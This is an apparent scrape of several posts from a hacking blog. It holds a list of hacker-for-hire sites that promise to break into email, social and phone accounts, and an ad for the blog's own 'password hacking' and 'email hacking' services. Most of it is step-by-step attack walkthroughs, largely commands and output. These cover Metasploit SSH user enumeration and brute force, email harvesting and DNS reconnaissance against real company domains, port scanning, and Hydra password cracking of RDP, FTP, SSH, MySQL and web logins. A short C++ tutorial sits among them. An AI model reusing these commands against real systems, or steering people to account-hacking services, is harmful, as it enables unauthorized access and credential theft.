Want to hire hackers? Some Hackers for Hire Website List

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

I have seen some hackers for hire company advertising their hacking services. They promise to hack Email password, Social Account password, database, even SmartPhone.

Some of them fake hackers for hire company(Their customer complaints) and some for real company to hire a professional hacker.

I will list some company here but it is your responsibility to verify them before working with them. Because i am not reviewing their services. It is just few hacking services websites list. So be careful !

Hackers for Hire site list

  1. centralhacker.com (Central hacker seems legit though)
  2. hirehackeronline.com (SEO purpose or real?)
  3. hacker1337.com ( Hacker 1337 open for long time)
  4. goldenhacker.com (Golden Hacker , Mean gold hacker?)
  5. hackeris.com
  6. neighborhoodhacker.com (Long time in business? The do the job?)
  7. hirethehacker.com (SEO Purpose or real)
  8. cryptohackers.com
  9. hireanhacker.com
  10. hirenhack.com (Seems new in business!)

Again i am not doing any review of their hacking services.  These list for them who are looking to hire a hacker.

Warning: Be careful , most of them might be just a scam and some may be for real!!!

Integer and String Based SQL Injection Tutorial

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

After Getting tutorial about IBM AppScan from Central Hacker who are also claim themselves as Hacker for hire i found two more tutorial on SQL Injection.

They used SQLI-LAB though but it is good to follow. As Hacker for hire they should post example & tutorial against real site?

Anyway, You guys can read these tutorial from their blog:

Integer Single Quote SQL Injection  

String Based SQL Injection

Note: pusheax does not have any kind of relation with these kind of company. It is just about sharing document!

Hacking SSH with Metasploit Auxiliary Modules

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Perhaps SSH is another popular services targeted by hackers. So in this post going to show you how to use metasploit modules to dictionary or brute force attack to hack SSH server.

Firstly we need to find the correct users to make the password guessing attack. We can enumerate username with metasploit auxiliary/scanner/ssh/ssh_enumusers module:

msf auxiliary(dns_srv_enum) > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(ssh_enumusers) > show options

Module options (auxiliary/scanner/ssh/ssh_enumusers):

   Name       Current Setting  Required  Description
   —-       —————  ——–  ———–
   Proxies                     no        Use a proxy chain
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      22               yes       The target port
   THREADS    1                yes       The number of concurrent threads
   THRESHOLD  10               yes       Amount of seconds needed before a user is considered found
   USER_FILE                   yes       File containing usernames, one per line

msf auxiliary(ssh_enumusers) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_enumusers) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
msf auxiliary(ssh_enumusers) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_enumusers) > run

[*] 192.168.67.136:22 – SSH – Checking for false positives
[*] 192.168.67.136:22 – SSH – Starting scan
[+] 192.168.67.136:22 – SSH – User ‘root‘ found
[!] 192.168.67.136:22 – SSH – User ‘owaspbroken’ not found
[!] 192.168.67.136:22 – SSH – User ‘broken’ not found
[!] 192.168.67.136:22 – SSH – User ‘mag’ not found
[!] 192.168.67.136:22 – SSH – User ‘admin’ not found
[!] 192.168.67.136:22 – SSH – User ‘Administrator’ not found
[!] 192.168.67.136:22 – SSH – User ‘owaspbwa’ not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_enumusers) >

The username ‘root’ is found . Let’s do something else…. thinking… thinking!

Let’s find out the version of the SSH for future reference to find exploits:

msf auxiliary(ssh_enumusers) > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_version) > run

[*] 192.168.67.136:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Well, Now lets guess the password. Always try to have good list of password otherwise it will waste of time. SSH is slow to guess password. Anyway, Here is how we can hack the ssh server:

msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   —-              —————  ——–  ———–
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > set USERASS_FILE true
USERASS_FILE => true
msf auxiliary(ssh_login) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH – Starting bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set PASSWORD owaspbwa
PASSWORD => owaspbwa
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH – Starting bruteforce
[+] 192.168.67.136:22 SSH – Success: ‘root:owaspbwa’ ‘uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux ‘
[*] Command shell session 1 opened (192.168.67.139:44027 -> 192.168.67.136:22) at 2014-12-17 04:23:57 -0500
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘Administrator:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbwa:owaspbwa’
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE /root/Desktop/users
PASS_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH – Starting bruteforce
[+] 192.168.67.136:22 SSH – Success: ‘root:owaspbwa’ ‘uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux ‘
[*] Command shell session 2 opened (192.168.67.139:43450 -> 192.168.67.136:22) at 2014-12-17 04:25:06 -0500
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:root’
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:owaspbroken’
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:broken’
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:mag’
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:admin’
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:Administrator’
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:root’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:owaspbroken’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:broken’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:mag’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:admin’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:Administrator’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:root’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:owaspbroken’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:broken’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:mag’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:admin’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:Administrator’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:root’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:owaspbroken’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:broken’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:mag’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:admin’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:Administrator’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:owaspbwa’
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >

Let me know if you have questions!

Metasploit Information Gathering Basic[Search for info]

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Metasploit is an open source penetration testing framework. Using some metasploit auxiliary  modules we can gather information against our target. Let’s see how to do it in simple step to collect emails.

 msf > use auxiliary/gather/search_email_collector
msf auxiliary(search_email_collector) > show options

Module options (auxiliary/gather/search_email_collector):

   Name           Current Setting  Required  Description
   —-           —————  ——–  ———–
   DOMAIN                          yes       The domain name to locate email addresses for
   OUTFILE                         no        A filename to store the generated email list
   SEARCH_BING    true             yes       Enable Bing as a backend search engine
   SEARCH_GOOGLE  true             yes       Enable Google as a backend search engine
   SEARCH_YAHOO   true             yes       Enable Yahoo! as a backend search engine

msf auxiliary(search_email_collector) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(search_email_collector) > run

[*] Harvesting emails …..
[*] Searching Google for email addresses from microsoft.com
[*] Extracting emails from Google search results…
[*] Searching Bing email addresses from microsoft.com
[*] Extracting emails from Bing search results…
[*] Searching Yahoo for email addresses from microsoft.com
[*] Extracting emails from Yahoo search results…
[*] Located 0 email addresses for microsoft.com
[*] Auxiliary module execution completed
msf auxiliary(search_email_collector) > set DOMAIN cisco.com
DOMAIN => cisco.com
msf auxiliary(search_email_collector) > run

[*] Harvesting emails …..
[*] Searching Google for email addresses from cisco.com
[*] Extracting emails from Google search results…
[*] Searching Bing email addresses from cisco.com
[*] Extracting emails from Bing search results…
[*] Searching Yahoo for email addresses from cisco.com
[*] Extracting emails from Yahoo search results…
[*] Located 2 email addresses for cisco.com
[*]     gsahagun@cisco.com
[*]     vern@cisco.com
[*] Auxiliary module execution completed
msf auxiliary(search_email_collector) >

Microsoft is little scary to post their email address publicly ?

Let’s find some DNS information with Metasploit against microsoft:

msf auxiliary(shodan_search) > use auxiliary/gather/dns_info
msf auxiliary(dns_info) > show options

Module options (auxiliary/gather/dns_info):

   Name    Current Setting  Required  Description
   —-    —————  ——–  ———–
   DOMAIN                   yes       The target domain name
   NS                       no        Specify the name server to use for queries, otherwise use the system configured DNS Server is used.

msf auxiliary(dns_info) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(dns_info) > run

[*] Enumerating microsoft.com
[+] microsoft.com – Address 134.170.188.221 found. Record type: A
[+] microsoft.com – Address 134.170.185.46 found. Record type: A
[+] microsoft.com – Name server ns4.msft.net (208.76.45.53) found. Record type: NS
[+] microsoft.com – Name server ns4.msft.net (2620:0:37::53) found. Record type: NS
[+] microsoft.com – Name server ns1.msft.net (208.84.0.53) found. Record type: NS
[+] microsoft.com – Name server ns1.msft.net (2620:0:30::53) found. Record type: NS
[+] microsoft.com – Name server ns2.msft.net (208.84.2.53) found. Record type: NS
[+] microsoft.com – Name server ns2.msft.net (2620:0:32::53) found. Record type: NS
[+] microsoft.com – Name server ns3.msft.net (193.221.113.53) found. Record type: NS
[+] microsoft.com – Name server ns3.msft.net (2620:0:34::53) found. Record type: NS
[+] microsoft.com – ns1.msft.net (208.84.0.53) found. Record type: SOA
[+] microsoft.com – ns1.msft.net (2620:0:30::53) found. Record type: SOA
[+] microsoft.com – Mail server microsoft-com.mail.protection.outlook.com (207.46.163.170) found. Record type: MX
[+] microsoft.com – Mail server microsoft-com.mail.protection.outlook.com (207.46.163.138) found. Record type: MX
[+] microsoft.com – Mail server microsoft-com.mail.protection.outlook.com (207.46.163.215) found. Record type: MX
[+] microsoft.com – Text info found: v=spf1 include:_spf-a.microsoft.com include:_spf-b.microsoft.com include:_spf-c.microsoft.com include:_spf-ssg-a.microsoft.com include:spf-a.hotmail.com ip4:147.243.128.24 ip4:147.243.128.26 ip4:147.243.128.25 ip4:147.243.1.47 ip4:147.243.1.48 -all . Record type: TXT
[+] microsoft.com – Text info found: FbUF6DbkE+Aw1/wi9xgDi8KVrIIZus5v8L6tbIQZkGrQ/rVQKJi8CjQbBtWtE64ey4NJJwj5J65PIggVYNabdQ== . Record type: TXT
[*] Auxiliary module execution completed
msf auxiliary(dns_info) > 


to find SRV record do the following:

msf auxiliary(dns_info) > use auxiliary/gather/dns_srv_enum
msf auxiliary(dns_srv_enum) > show options

Module options (auxiliary/gather/dns_srv_enum):

   Name    Current Setting  Required  Description
   —-    —————  ——–  ———–
   ALL_NS  false            no        Run against all name servers for the given domain.
   DOMAIN                   yes       The target domain name.

msf auxiliary(dns_srv_enum) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(dns_srv_enum) > run

[*] Enumerating SRV Records for microsoft.com
[+] Host: sipfed.microsoft.com IP: 131.107.255.86 Service: sipfederationtls Protocol: tcp Port: 5061
[+] Host: sipdog3.microsoft.com IP: 131.107.1.47 Service: xmpp-server Protocol: tcp Port: 5269
[*] Auxiliary module execution completed

Bit lazy to format the text to code. So this might be little hard to read. But I think you still now have basic idea that how you can use metasploit for information gathering. If you like to see more in details or any questions …. you can post comments here.

  

Metasploit Port Scanning

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Port Scan is Often done by hackers and penetration tester to identifying and discovering internal services of target host. Port Scanning is an important action for gathering more information of the target host. Today, We will see how to use Metasploit to scan port. Metasploit is a free and open source popular  Exploitation Framework. This Framework widely used by hackers and professional penetration tester. Let’s see how we can use Metasploit for basic port scanning.

If you have Kali Linux then Metasploit already installed ! Or download from Rapid7 and install it.

Our Target: http://192.168.67.136/ 

Our First Module is auxiliary/scanner/portscan/syn

Now let’s start scanning!


msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > show options

Module options (auxiliary/scanner/portscan/syn):

Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
INTERFACE no The name of the interface
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds

Now let's start scanning!Simply we need to set RHOSTS which is 192.168.67.136 and Port Range 1-65535(Do you really want to scan all port? )

msf auxiliary(syn) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(syn) > set PORTS 80,3306,22,1337
PORTS => 80,3306,22,1337
msf auxiliary(syn) >

Now set interesting ports and execute “run” Command:

 msf auxiliary(syn) > set PORTS 80,3306,22,1337,139
PORTS => 80,3306,22,1337,139
msf auxiliary(syn) > run

[*]  TCP OPEN 192.168.67.136:22
[*]  TCP OPEN 192.168.67.136:80
[*]  TCP OPEN 192.168.67.136:139
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) >

Now let’s how auxiliary/scanner/portscan/tcp works:

msf auxiliary(tcp) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(tcp) > set PORTS 80,3306,22,1337,139
PORTS => 80,3306,22,1337,139
msf auxiliary(tcp) > run

[*] 192.168.67.136:139 – TCP OPEN
[*] 192.168.67.136:22 – TCP OPEN
[*] 192.168.67.136:80 – TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >

Really Easy but nmap is best!

More Metasploit Tutorials Coming soon! 🙂

Hacker For Hire

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Hacker for hire? What do you mean by that?

PushEax now offer Ethical Hacker for hire services widely.

What PushEax can do for you?

Website hacking & Security Analysis, Accounts Security checking, Virus Removal, Computer Forensic and many more.

Does it cost money if hire hacker? 

PushEax will work hard for you. So it costs money!


How many services you provide?

There are many hacker for hire services pusheax offer. If something is missing just contact.

PushEax Deal with Server hacking, Password hacking, Email hacking and more security ananlyzing services. Now PushEax provide most kind of white hat hacking services widely ……. More Details!

Compiling c++ multiple sources file

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

c++ multiple sources file compiling using g++ is easy but it requires a little manual works. Multiple source file compiling can be more easy and straight using make file. But i will give here only a simple example. If you think you need  example of makefile too then you can Google search or write comments and i will update this post!

Hope you already understand the basic of c++ like functions,class etc.

C++ source file one

#include <iostream>
#include "hell.h"

void testing(){
std::cout<<"Testn";
testing1();
}

int main(){
std::cout<<"Testn";
testing();

return 0;
}

C++ source file two

#include "hell.h"

void testing1(){
Test tt;
tt.t="LALA";
std::cout<<"Hello world 2n"<<tt.t<<std::endl;
        tt.h();
 }
void test::h(){
std::cout<<"C++ methodn";
}
 
 
 

I declared object name of the class called “Test“.
t is variable declared in the header file so tt.t mean “use the variable from class Test!”.
You can write any valid code in the function or in c++ Class method!

C++ Header file

#ifndef HELL_H //if hell.h not defined the go to next preprocessor
#define HELL_H // Well, Include the header!

#include <iostream>

void testing1();
void testing();

class Test{
public:
std::string t;
void h();
};

#endif //Protection done!

It is just simple compiling the sources using g++ :

g++ main.cpp main2.cpp -o main

pro@pusheax:~/coding/c++/basic/multi$ ./main
Test
Test
Hello world 2
LALA
C++ method

Thanks for reading!

Brute force attack & dictionary password cracking using hydra

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Brute force attack and Dictionary password cracking attack is still effective. Brute force attack can be more effective if the hacker has good knowledge in password profiling,information gathering. Today, i will shortly explain that how a hacker can crack password using hydra brute force attack or dictionary attack. Before that let me give you a short definition of Brute force and dictionary attack.

Brute force attack

Brute force attack is combination of all character a-z,A-Z,1-3 and other special characters.

Dictionary password attack

Dictionary attack is a list of common password. For example, you know “admin” is used as password to protect various confidential resource. So you put the “admin” word in your dictionary file. You also can download free password list from various source(Google search!). If the hacker is lucky then password will be in the list.

I will explain how a hacker can make brute force attack using hydra to crack various online accounts.

Brute Force Attack

If hackers decide to make pure brute force then they need to exclude the option ‘-P’ and use ‘-x min:max:char’, for example ‘-x 3:3:a’ :

root@find:~/Desktop# hydra -t 10 -V -f -l root -x 4:6:a ftp://192.168.67.132

The hydra syntax:
-t = How many parallel attempt at a time(1/5/10/100 ?). Don’t use too much otherwise you will get false result
-V = Show output
-f = Stop when found the password.
-l = The Username (-L for username from file)
-P= Dictionary file
IP-address-or-domain module-such-as-http-form

Cracking the RDP password

We know the default username of windows is “administrator” So we can brute force the password only:

root@find:~/Desktop# hydra -t 1 -V -f -l administrator -P common.txt rdp://192.168.67.132
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 13:24:21
[DATA] 1 task, 1 server, 933 login tries (l:1/p:933), ~933 tries per task
[DATA] attacking service rdp on port 3389
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Admin" - 1 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Administration" - 2 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "crm" - 3 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CVS" - 4 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS" - 5 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS25" - 6 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS31" - 7 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "INSTALL_admin" - 8 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Log" - 9 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Logs" - 10 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Pages" - 11 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "youradmin" - 12 of 933 [child 0]
[3389][rdp] host: 192.168.67.132 login: administrator password: youradmin
[STATUS] attack finished for 192.168.67.132 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 13:24:46

I did it on vmware workstation and was too slow!

Cracking FTP password

Hacker knows the user name of the FTP is 'root' , So hacker make a quick password guessing with following command:

root@find:~/Desktop# hydra -t 5 -V -f -l root -P common.txt ftp://192.168.67.132
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 13:45:55
[DATA] 5 tasks, 1 server, 934 login tries (l:1/p:934), ~186 tries per task
[DATA] attacking service ftp on port 21
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Admin" - 1 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Administration" - 2 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "crm" - 3 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CVS" - 4 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS" - 5 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS25" - 6 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS31" - 7 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "INSTALL_admin" - 8 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Log" - 9 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Logs" - 10 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Pages" - 11 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "youradmin" - 12 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "ftpadmin" - 13 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Servlet" - 14 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Servlets" - 15 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "SiteServer" - 16 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Sources" - 17 of 934 [child 0]
[21][ftp] host: 192.168.67.132 login: root password: ftpadmin
[STATUS] attack finished for 192.168.67.132 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 13:45:55
root@find:~/Desktop#

Here the password is ftpadmin!

root@find:~/Desktop# ftp 192.168.67.132
Connected to 192.168.67.132.
220 Hello, I'm freeFTPd 1.0
Name (192.168.67.132:root): root
331 Password required for root
Password:
230 User root logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection
drwxr-xr-x 1 root root 0 Jan 7 13:39 .
drwxr-xr-x 1 root root 0 Jan 7 13:39 ..
226 Directory send OK

Cracking SSH password with hydra

root@find:~/Desktop# hydra -t 5 -V -f -l root -P common.txt localhost ssh
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 14:11:56
[DATA] 5 tasks, 1 server, 935 login tries (l:1/p:935), ~187 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target localhost - login "root" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target localhost - login "root" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target localhost - login "root" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target localhost - login "root" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS" - 5 of 935 [child 4]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS25" - 6 of 935 [child 1]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS31" - 7 of 935 [child 3]
[ATTEMPT] target localhost - login "root" - pass "INSTALL_admin" - 8 of 935 [child 4]
[ATTEMPT] target localhost - login "root" - pass "Log" - 9 of 935 [child 2]
[ATTEMPT] target localhost - login "root" - pass "sshfuck" - 10 of 935 [child 0]
[22][ssh] host: 127.0.0.1 login: root password: sshfuck
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 14:11:58

MySQL password cracking using hydra

In this case we are going to crack a empty password of mysql. Some Peoples still does not use password to protect their database server. We can make brute force attack like this:

root@find:~/Desktop# hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 14:18:16
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] 4 tasks, 1 server, 937 login tries (l:1/p:937), ~234 tries per task
[DATA] attacking service mysql on port 3306
[ATTEMPT] target localhost - login "root" - pass "root" - 1 of 937 [child 0]
[ATTEMPT] target localhost - login "root" - pass "" - 2 of 937 [child 1]
[ATTEMPT] target localhost - login "root" - pass "Admin" - 3 of 937 [child 2]
[ATTEMPT] target localhost - login "root" - pass "Administration" - 4 of 937 [child 3]
[3306][mysql] host: 127.0.0.1 login: root password:
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 14:18:16

Attention to the option of hydra: -e ns .

Web Form brute forcing

I have coded a simple html login form for this test. Hydra can brute force web form faster and effectively than other tools. But it requires you to understand that how the form is being handled. So the hacker need to have basic understanding of html too. Also the hacker/you need to find out the correct username otherwise it will be failed or will need to brute force the  user name which is really bad idea.

The login form:

<html>
<head>
<title>Admin Login</title>
</head>

<body>
<center>
<h1>Administrator Login</h1>
<form action="log.php" method="post" >
Username:<input type="text" name="user" placeholder="admin"> <br>
Password:<input type="password" name="password" placeholder="password"><br>
<input type="submit" name="user" value="submit" >
</form>
</center>

</body>
</html>

We actually need to brute force the name=”password” . “password” is the name of the password field which need to match with an string from database or from php hard coded string. For your better understanding i am pasting the log.php too:

<?php

$pass="yourpass";

$passGet=$_POST["password"];

if($passGet==$pass){
echo "success!";
echo "<br>";
}

else{
echo "fail";
}


?>

In the php code $passGet=$_POST[“password”]; getting field string by post method and comparing with variable $pass . If you input yourpass in password field then it will say success otherwise fail.

Imagine, We don’t know the password so we are going to brute force it using hydra. We have following information:

URL: http://http://localhost/login/ (Optional?)
Action page: http://localhost/login/log.php   (Required)
User: admin
Form parameter:  user=admin&password=brute-force-here   (see the html!)

Let us now brute force the password using thc-hydra.

Hydra command 1:

hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"

Here is output:

root@find:~/Desktop# hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-09 06:08:07
[DATA] 4 tasks, 1 server, 935 login tries (l:1/p:935), ~233 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS" - 5 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS25" - 6 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS31" - 7 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "INSTALL_admin" - 8 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Log" - 9 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "yourpass" - 10 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Logs" - 11 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Pages" - 12 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "youradmin" - 13 of 935 [child 1]
[80][www-form] host: 192.168.206.1 login: admin password: yourpass
1 of 1 target successfully completed, 1 valid password found
